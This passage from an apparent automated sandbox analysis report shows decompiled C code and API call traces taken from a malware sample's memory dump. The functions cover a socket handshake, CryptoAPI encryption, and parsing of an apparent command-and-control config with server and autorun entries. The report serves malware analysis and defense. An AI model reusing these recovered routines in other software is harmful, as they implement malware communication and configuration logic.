      • Part of subcall function 003A556B: memcpy.MSVCRT ref: 003A56A1
      • Part of subcall function 003A56CF: memset.MSVCRT ref: 003A5700
      • Part of subcall function 003A56CF: htons.WS2_32(00000000), ref: 003A571E
      • Part of subcall function 003A56CF: htons.WS2_32(00000014), ref: 003A5726
      • Part of subcall function 003A56CF: memset.MSVCRT ref: 003A577A
      • Part of subcall function 003A56CF: htons.WS2_32(?), ref: 003A57B1
      • Part of subcall function 003A5853: CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003A587E
    • memcpy.MSVCRT ref: 003A5F08
      • Part of subcall function 003A3B23: GetSystemTime.KERNEL32(?,?,?,?,003A5121,00000000,00001000), ref: 003A3B2D
      • Part of subcall function 003A3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003A5121,00000000,00001000), ref: 003A3B3B
      • Part of subcall function 003A3B23: __aulldiv.INT64 ref: 003A3B50
    • htonl.WS2_32(-00000096), ref: 003A5F3F
      • Part of subcall function 003AEA68: sscanf.MSVCRT ref: 003AEA7E
      • Part of subcall function 003AEA68: inet_addr.WS2_32(?), ref: 003AEA94
      • Part of subcall function 003AEA68: htons.WS2_32(?), ref: 003AEAA7
    • htons.WS2_32(00000000), ref: 003A5FAA
      • Part of subcall function 003A588E: memset.MSVCRT ref: 003A58F8
      • Part of subcall function 003A5949: memset.MSVCRT ref: 003A5979
      • Part of subcall function 003A5949: htons.WS2_32(E`:), ref: 003A5987
      • Part of subcall function 003A5949: memcpy.MSVCRT ref: 003A599B
      • Part of subcall function 003A5949: htons.WS2_32(?), ref: 003A5A0A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 28%
    			E003A4054(intOrPtr* __ebx, void* __eflags) {
    				void* _v8;
    				char _v9;
    				signed int _v16;
    				intOrPtr _v29;
    				char _v30;
    				char _v32;
    				void _v36;
    				char _v40;
    				intOrPtr _v52;
    				char _v56;
    				char _v84;
    				void* _v88;
    				char _v104;
    				char _v124;
    				char _v144;
    				char _v164;
    				void _v184;
    				void _v204;
    				void* __esi;
    				int _t85;
    				signed short _t88;
    				void* _t91;
    				void* _t102;
    				intOrPtr _t104;
    				intOrPtr* _t108;
    				signed short _t111;
    				void _t113;
    				void* _t119;
    				void* _t121;
    				intOrPtr* _t141;
    				signed int _t160;
    				signed int _t164;
    				intOrPtr* _t171;
    				signed int _t172;
    				void* _t175;
    				void* _t189;
    				void* _t202;
    				int _t204;
    				void* _t211;
    				void* _t212;
    				void* _t213;
    				void* _t216;
    
    				_t141 = __ebx;
    				_v8 =  *0x3b8538(0x100000);
    				if(E003AFD0B( *__ebx, 0x3b6670, 7) != 7 || E003AFB73( *__ebx,  &_v32, 5) != 5 || _v30 != 7) {
    					L24:
    					 *0x3b8540(_v8);
    					_t85 = 0;
    				} else {
    					_t171 = __imp__#9;
    					_t88 =  *_t171(_v29);
    					_v9 = 0;
    					_v16 = _t88 & 0x0000ffff;
    					if(E003AFB73( *__ebx, _v8, _t88 & 0x0000ffff) != _v16) {
    						goto L24;
    					} else {
    						_t91 = 0;
    						if(_v16 <= 0) {
    							goto L24;
    						} else {
    							do {
    								if( *((char*)(_t91 + _v8)) == 3) {
    									_v9 = 1;
    								}
    								_t91 = _t91 + 1;
    							} while (_t91 < _v16);
    							if(_v9 == 0 || E003AFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x81) {
    								goto L24;
    							} else {
    								_v16 =  *_t171(_v29) & 0x0000ffff;
    								if(E003AFB73( *_t141, _v8,  *_t171(_v29) & 0x0000ffff) != _v16 || E003AFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x82) {
    									goto L24;
    								} else {
    									_t172 =  *_t171(_v29) & 0x0000ffff;
    									if(E003AFB73( *_t141, _v8, _t172) != _t172 || E003AFB73( *_t141, _v8, 0x200) != 0x200) {
    										goto L24;
    									} else {
    										_t102 = _v8;
    										_t248 =  *((char*)(_t102 + 2)) - 8;
    										if( *((char*)(_t102 + 2)) != 8) {
    											goto L24;
    										} else {
    											memset(_t102, 0, 0x200);
    											asm("movsw");
    											asm("movsb");
    											_t202 = _v8;
    											_t104 = E003A3B23(_t248);
    											__imp__#8(_t104);
    											 *((intOrPtr*)(_t202 + 3)) = _t104;
    											 *((short*)(_t202 + 7)) = 0x404;
    											_t108 =  *_t141;
    											_v40 = 0x10;
    											__imp__#5( *_t108,  &_v56,  &_v40);
    											if(_t108 != 0) {
    												goto L24;
    											} else {
    												_t159 = _v52;
    												 *((intOrPtr*)(_t202 + 9)) = _v52;
    												if(E003AFD0B( *_t141, _t202, 0x200) != 0x200) {
    													goto L24;
    												} else {
    													_t111 = E003AE937(_t159);
    													_t175 = _v8;
    													_t204 = 0;
    													 *(_t141 + 4) = _t111;
    													memset(_t175, 0, 0x200);
    													_t113 =  *(_t141 + 4) & 0x0000ffff;
    													__imp__#9(_t113);
    													 *_t175 = _t113;
    													 *((char*)(_t175 + 2)) = 5;
    													do {
    														 *((char*)(_t216 + _t204 - 0x20)) = E003AE8E0();
    														_t204 = _t204 + 1;
    													} while (_t204 < 0x14);
    													_t160 = 5;
    													memcpy(_t175 + 3,  &_v36, _t160 << 2);
    													if(E003AFD0B( *_t141, _v8, 0x200) != 0x200 || E003AFB73( *_t141, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 6) {
    														goto L24;
    													} else {
    														_t164 = 5;
    														_t119 = memcpy( &_v204,  &_v36, _t164 << 2);
    														_t121 = memcpy(memcpy( &_v184, _t119 + 3, 0 << 2),  &_v204, 0 << 2);
    														_t189 = 0x29;
    														 *((char*)(_t121 + 0x28)) = 0;
    														E003A3B5C();
    														_t211 = _v8;
    														 *((char*)(_t211 + 0x28)) = 1;
    														E003A3B5C(_t211, _t189,  &_v144);
    														 *((char*)(_t211 + 0x28)) = 2;
    														E003A3B5C(_t211, _t189,  &_v124);
    														 *((char*)(_t211 + 0x28)) = 3;
    														E003A3B5C(_t211, _t189,  &_v104);
    														 *((char*)(_t211 + 0x28)) = 4;
    														E003A3B5C(_t211, _t189,  &_v84);
    														_t212 = _t141 + 8;
    														 *0x3b8ab4(_t212, _t121, _t189,  &_v164, 0xa, 5);
    														 *0x3b899c(_t212,  &_v144, 0x14);
    														_t213 = _t141 + 0x7c;
    														 *0x3b8ab4(_t213);
    														 *0x3b899c(_t213,  &_v124, 0x14);
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														 *(_t141 + 0x120) =  *(_t141 + 0x120) & 0x00000000;
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														 *(_t141 + 0x134) =  *(_t141 + 0x134) & 0x00000000;
    														 *0x3b8540(_v8);
    														_t85 = 1;
    														__eflags = 1;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t85;
    			}

    APIs
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    • htons.WS2_32(?), ref: 003A40B3
    • htons.WS2_32(?), ref: 003A4122
    • htons.WS2_32(?), ref: 003A4165
    • memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A3B23: GetSystemTime.KERNEL32(?,?,?,?,003A5121,00000000,00001000), ref: 003A3B2D
      • Part of subcall function 003A3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003A5121,00000000,00001000), ref: 003A3B3B
      • Part of subcall function 003A3B23: __aulldiv.INT64 ref: 003A3B50
    • htonl.WS2_32(00000000), ref: 003A41C5
    • getpeername.WS2_32(?,?,?), ref: 003A41EA
    • memset.MSVCRT ref: 003A4226
    • htons.WS2_32(?), ref: 003A4233
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003A61AD(intOrPtr* _a4, signed short _a8) {
    				intOrPtr _v8;
    				void _v24;
    				char _v44;
    				void _v160;
    				void* __esi;
    				void* _t47;
    				signed int _t50;
    				intOrPtr* _t54;
    				short _t56;
    				intOrPtr* _t57;
    				void* _t75;
    				void _t82;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    				signed int _t97;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				intOrPtr* _t109;
    				intOrPtr* _t113;
    				void* _t117;
    				intOrPtr* _t118;
    
    				_t109 = _a4;
    				 *(_t109 + 0x468) =  *(_t109 + 0x468) & 0x00000000;
    				 *(_t109 + 0x46c) =  *(_t109 + 0x46c) & 0x00000000;
    				_t47 =  *0x3b8538(0x200);
    				_t94 = _t47;
    				_v8 =  *0x3b8538(0x200);
    				memset(_t94, 0, 0x200);
    				 *_t94 = 1;
    				_t50 =  *(_t109 + 0x138) & 0x0000ffff;
    				__imp__#9(_t50);
    				 *(_t94 + 3) = _t50;
    				sprintf( &_v24, ":%d", _a8 & 0x0000ffff);
    				_t54 =  &_v24;
    				_t95 = _t54 + 1;
    				do {
    					_t107 =  *_t54;
    					_t54 = _t54 + 1;
    				} while (_t107 != 0);
    				_t56 = _t54 - _t95 + 1;
    				__imp__#9(_t56);
    				 *((short*)(_t94 + 9)) = _t56;
    				_t57 =  &_v24;
    				_t96 = _t57 + 1;
    				do {
    					_t108 =  *_t57;
    					_t57 = _t57 + 1;
    				} while (_t108 != 0);
    				_t17 = _t94 + 0xb; // 0xb
    				memcpy(_t17,  &_v24, _t57 - _t96 + 1);
    				_t18 = _t109 + 0x338; // 0x338
    				_t117 = _t18;
    				 *0x3b899c(_t117, _t94, 0x1fd);
    				_t97 = 0x1d;
    				memcpy( &_v160, _t117, _t97 << 2);
    				 *0x3b8ab0( &_v160,  &_v44);
    				_t113 = _a4;
    				 *((intOrPtr*)(_t94 + 5)) = _v44;
    				_t26 = _t113 + 0x450; // 0x450
    				_t27 = _t113 + 0x440; // 0x440
    				_t29 = _t113 + 0x420; // 0x420
    				if(E003A3BB7(_t29, _t94, 0x1fd, _v8, _t27, _t26) == 0) {
    					L12:
    					 *0x3b8540(_t94);
    					 *0x3b8540(_v8);
    					_t75 = 0;
    				} else {
    					memset(_t94, 0, 0x200);
    					_t118 = _t113;
    					_t30 = _t118 + 0x120; // 0x120
    					_t31 = _t118 + 0x110; // 0x110
    					_t32 = _t94 + 3; // 0x3
    					_t34 = _t118 + 0xf0; // 0xf0
    					if(E003A3BB7(_t34, _v8, 0x1fd, _t32, _t31, _t30) == 0) {
    						goto L12;
    					} else {
    						_t82 =  *(_t118 + 4) & 0x0000ffff;
    						__imp__#9(_t82);
    						 *_t94 = _t82;
    						 *((char*)(_t94 + 2)) = 3;
    						if(E003AFD0B( *_t118, _t94, 0x200) != 0x200 || E003AFB73( *_t118, _t94, 0x200) != 0x200 ||  *((char*)(_t94 + 2)) != 3) {
    							goto L12;
    						} else {
    							_t85 = _t113;
    							_t38 = _t85 + 0x134; // 0x134
    							_t39 = _t85 + 0x124; // 0x124
    							_t41 = _t94 + 3; // 0x3
    							if(E003A3BB7(_t113 + 0x100, _t41, 0x1fd, _v8, _t39, _t38) == 0) {
    								goto L12;
    							} else {
    								_t42 = _t113 + 0x464; // 0x464
    								_t43 = _t113 + 0x454; // 0x454
    								if(E003A3BB7(_t113 + 0x430, _v8, 0x1fd, _t94, _t43, _t42) == 0 ||  *_t94 != 4) {
    									goto L12;
    								} else {
    									 *0x3b8540(_t94);
    									 *0x3b8540(_v8);
    									_t75 = 1;
    								}
    							}
    						}
    					}
    				}
    				return _t75;
    			}

    APIs
    • memset.MSVCRT ref: 003A61E9
    • htons.WS2_32(?), ref: 003A61FC
    • sprintf.MSVCRT ref: 003A6214
    • htons.WS2_32(?), ref: 003A622E
    • memcpy.MSVCRT ref: 003A6251
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • memset.MSVCRT ref: 003A62C3
    • htons.WS2_32(?), ref: 003A6300
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEDCE
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEDE1
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEE08
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEEA9
    • send.WS2_32(?,?,0000008B,00000000), ref: 003AFA0A
    • htons.WS2_32(00000301), ref: 003AFA3F
    • htons.WS2_32(00000001), ref: 003AFA47
    • send.WS2_32(?,?,00000006,00000000), ref: 003AFA5D
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AF4EF: recv.WS2_32(?,00000000,003AF7A5,00000000), ref: 003AF519
    • htons.WS2_32(?), ref: 003AFAEA
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 60%
    			E0039DCD0(void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* _v24;
    				char _v28;
    				char _v32;
    				short _v36;
    				char _v44;
    				intOrPtr _v48;
    				char _v248;
    				void* __ebx;
    				void* _t69;
    				intOrPtr _t70;
    				intOrPtr _t71;
    				intOrPtr _t72;
    				intOrPtr* _t73;
    				intOrPtr* _t74;
    				intOrPtr* _t84;
    				char _t87;
    				char _t88;
    				char _t89;
    				intOrPtr* _t91;
    				intOrPtr* _t94;
    				void* _t96;
    				intOrPtr* _t100;
    				void* _t103;
    				void* _t106;
    				void* _t109;
    				void* _t110;
    				void* _t115;
    				intOrPtr* _t116;
    				void* _t117;
    				intOrPtr _t131;
    				intOrPtr* _t159;
    				void* _t161;
    				void* _t162;
    				void* _t163;
    
    				_v28 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v8 = 0;
    				_v32 = 0;
    				_v24 = 0;
    				_v36 = 0;
    				E0039BB30( &_v44);
    				_v48 = __ecx + 0x2c;
    				E00393270(_t115, __ecx + 0x2c);
    				_t159 = _a4;
    				_t69 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x58))))(_t159,  &_v36, __edi, __esi, _t115);
    				_t116 = __imp__#6;
    				if(_t69 >= 0) {
    					if(_v36 != 0xffff) {
    						L22:
    						_v32 = 1;
    					} else {
    						_push( &_v24);
    						_push(_t159);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x30))))() >= 0) {
    							_t84 = _v24;
    							_push( &_v28);
    							_push(_t84);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x20))))() >= 0) {
    								_t161 = 0;
    								if(_v28 <= 0) {
    									goto L22;
    								} else {
    									while(1) {
    										_t87 = _v20;
    										if(_t87 != 0) {
    											 *_t116(_t87);
    										}
    										_t88 = _v12;
    										_v20 = 0;
    										if(_t88 != 0) {
    											 *_t116(_t88);
    										}
    										_t89 = _v16;
    										_v12 = 0;
    										if(_t89 != 0) {
    											 *_t116(_t89);
    										}
    										_v16 = 0;
    										E0039B1E0(_t116,  &_v44);
    										_t91 = _v24;
    										_push( &_v8);
    										_push(_t161);
    										_push(_t91);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))() < 0) {
    											goto L23;
    										}
    										_t94 = _v8;
    										_t96 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xa4))))(_t94,  &_v20);
    										_t174 = _t96;
    										if(_t96 >= 0) {
    											E00399090(_t174,  &_v248, 0x25);
    											_t131 =  *0x3b8628; // 0x593938
    											_t162 = _t162 + 8;
    											_push( &_v248);
    											_push(_v20);
    											if( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))() != 0) {
    												L21:
    												_t100 = _v8;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
    												_t161 = _t161 + 1;
    												_v8 = 0;
    												if(_t161 < _v28) {
    													continue;
    												} else {
    													goto L22;
    												}
    											} else {
    												_t103 = E0039A140( &_v44, _v8);
    												_t176 = _t103;
    												if(_t103 != 0) {
    													E00399090(_t176,  &_v248, 0x26);
    													_t163 = _t162 + 8;
    													_t106 = E00391A10( &_v44,  &_v248,  &_v12);
    													_t177 = _t106;
    													if(_t106 != 0) {
    														E00399090(_t177,  &_v248, 0x27);
    														_t109 = E00391A10( &_v44,  &_v248,  &_v16);
    														_push(0xc);
    														L0039A47E();
    														_t162 = _t163 + 0xc;
    														if(_t109 == 0) {
    															_t110 = 0;
    															__eflags = 0;
    														} else {
    															_t110 = E00392120(_t109, _v12, _v16, 0);
    														}
    														if(E003A0A50(_v48, _t110) != 0) {
    															goto L21;
    														}
    													}
    												}
    											}
    										}
    										goto L23;
    									}
    								}
    							}
    						}
    					}
    				}
    				L23:
    				_t70 = _v20;
    				if(_t70 != 0) {
    					 *_t116(_t70);
    				}
    				_t71 = _v12;
    				if(_t71 != 0) {
    					 *_t116(_t71);
    				}
    				_t72 = _v16;
    				if(_t72 != 0) {
    					 *_t116(_t72);
    				}
    				_t73 = _v8;
    				if(_t73 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
    				}
    				_t74 = _v24;
    				_pop(_t117);
    				if(_t74 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
    				}
    				L003926B0(_t117,  &_v44);
    				return _v32;
    			}

    APIs
      • Part of subcall function 00393270: ??3@YAXPAX@Z.MSVCRT ref: 00393291
    • SysFreeString.OLEAUT32(?), ref: 0039DD78
    • SysFreeString.OLEAUT32(?), ref: 0039DD85
    • SysFreeString.OLEAUT32(?), ref: 0039DD92
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • ??2@YAPAXI@Z.MSVCRT ref: 0039DE65
      • Part of subcall function 003A0A50: ??2@YAPAXI@Z.MSVCRT ref: 003A0A7F
      • Part of subcall function 00392120: SysAllocString.OLEAUT32(00000000), ref: 00392131
      • Part of subcall function 00392120: SysAllocString.OLEAUT32(?), ref: 00392139
    • SysFreeString.OLEAUT32(?), ref: 0039DEB9
    • SysFreeString.OLEAUT32(?), ref: 0039DEC3
    • SysFreeString.OLEAUT32(?), ref: 0039DECD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 50%
    			E0039AA60(void* __ecx) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				short _v40;
    				char _v44;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t61;
    				intOrPtr _t64;
    				intOrPtr _t65;
    				intOrPtr* _t66;
    				intOrPtr* _t67;
    				intOrPtr* _t71;
    				intOrPtr* _t76;
    				void* _t77;
    				char _t78;
    				char _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t83;
    				intOrPtr _t87;
    				intOrPtr* _t88;
    				intOrPtr* _t90;
    				void* _t93;
    				intOrPtr _t95;
    				void* _t127;
    				void* _t128;
    				void* _t130;
    
    				_t127 = __ecx;
    				_t61 =  *((intOrPtr*)(__ecx + 4));
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t61 != 0) {
    					_push( &_v20);
    					_push(_t61);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0xb4))))() >= 0) {
    						_t71 = _v20;
    						_push( &_v12);
    						_push(_t71);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0xa4))))() >= 0 && E003B10C0( &_v44, _v12) == 6 && _v44 == 0x6f63636d && _v40 == 0x666e) {
    							_t76 = _v20;
    							_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x34))))(_t76,  &_v8);
    							if(_t77 >= 0) {
    								_push(_t128);
    								if(_t77 == 1) {
    									L35:
    									_v28 = 1;
    								} else {
    									while(1) {
    										_t78 = _v12;
    										if(_t78 != 0) {
    											__imp__#6(_t78);
    										}
    										_t79 = _v16;
    										_v12 = 0;
    										if(_t79 != 0) {
    											__imp__#6(_t79);
    										}
    										_t80 = _v8;
    										_v16 = 0;
    										_push( &_v12);
    										_push(_t80);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))() < 0) {
    											goto L36;
    										}
    										_t83 = _v8;
    										_push( &_v16);
    										_push(_t83);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))() >= 0) {
    											_t31 =  &_v44; // 0x6f63636d
    											_t87 = E003B10C0(_t31, _v12);
    											if(_t87 != 3) {
    												if(_t87 != 4) {
    													if(_t87 != 5) {
    														if(_t87 != 7 || _v44 != 0x6f747561 || _v40 != 0x6e7572) {
    															goto L33;
    														} else {
    															_t93 = E0039DCD0(_t127, _t127, _t128, _v8);
    															goto L32;
    														}
    													} else {
    														if(_v44 != 0x76726573 || _v40 != 0x73) {
    															goto L33;
    														} else {
    															_t93 = E00393E30(_t127, _v8);
    															L32:
    															if(_t93 != 0) {
    																goto L33;
    															}
    														}
    													}
    												} else {
    													if(_v44 == 0x67617467) {
    														_t95 =  *((intOrPtr*)(_t127 + 0x14));
    														if(_t95 != 0) {
    															_t95 = E0039BB40(_t95);
    															_t130 = _t130 + 4;
    														}
    														__imp__#2(_v16);
    														 *((intOrPtr*)(_t127 + 0x14)) = _t95;
    													}
    													goto L33;
    												}
    											} else {
    												if(_v44 == 0x726576) {
    													__imp___wtoi(_v16);
    													_t130 = _t130 + 4;
    													 *((intOrPtr*)(_t127 + 0x10)) = _t87;
    												}
    												L33:
    												_t88 = _v8;
    												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x40))))(_t88,  &_v24);
    												if(_t128 >= 0) {
    													_t90 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
    													_v8 = _v24;
    													_v24 = 0;
    													if(_t128 != 1) {
    														continue;
    													} else {
    														goto L35;
    													}
    												}
    											}
    										}
    										goto L36;
    									}
    								}
    								L36:
    							}
    						}
    					}
    					_t64 = _v16;
    					if(_t64 != 0) {
    						__imp__#6(_t64);
    					}
    					_t65 = _v12;
    					if(_t65 != 0) {
    						__imp__#6(_t65);
    					}
    					_t66 = _v8;
    					if(_t66 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 8))))(_t66);
    					}
    					_t67 = _v20;
    					if(_t67 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}


































    APIs
    • SysFreeString.OLEAUT32(?), ref: 0039AC57
      • Part of subcall function 003B10C0: tolower.MSVCRT ref: 003B10FB
    • SysFreeString.OLEAUT32(?), ref: 0039AB18
    • SysFreeString.OLEAUT32(?), ref: 0039AB29
    • SysAllocString.OLEAUT32(?), ref: 0039ABB4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _wtoi.MSVCRT ref: 0039AB84
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD78
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD85
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD92
      • Part of subcall function 0039DCD0: ??2@YAPAXI@Z.MSVCRT ref: 0039DE65
